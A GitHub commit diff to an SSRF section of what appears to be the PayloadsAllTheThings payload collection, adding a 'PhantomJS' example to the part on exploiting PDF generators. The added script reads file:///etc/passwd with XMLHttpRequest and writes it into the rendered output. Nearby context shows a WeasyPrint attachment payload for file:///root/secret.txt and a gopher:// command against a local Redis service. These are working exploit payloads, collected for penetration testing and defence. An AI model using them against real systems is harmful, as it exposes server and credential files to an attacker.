SSRF PDF PhantomJS

This commit is contained in:
Swissky 2021-09-08 12:49:32 +02:00 committed by GitHub
parent 3af70155e2
commit c957271453
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -450,7 +450,7 @@ gopher://127.0.0.1:6379/_save
## SSRF exploiting PDF file
![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.jpg?raw=true)
![https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png)
Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title)
@ -458,6 +458,18 @@ Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR
<link rel=attachment href="file:///root/secret.txt">
```
Example with PhantomJS
```js
<script>
exfil = new XMLHttpRequest();
exfil.open("GET","file:///etc/passwd");
exfil.send();
exfil.onload = function(){document.write(this.responseText);}
exfil.onerror = function(){document.write('failed!')}
</script>
```
## Blind SSRF
> When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read.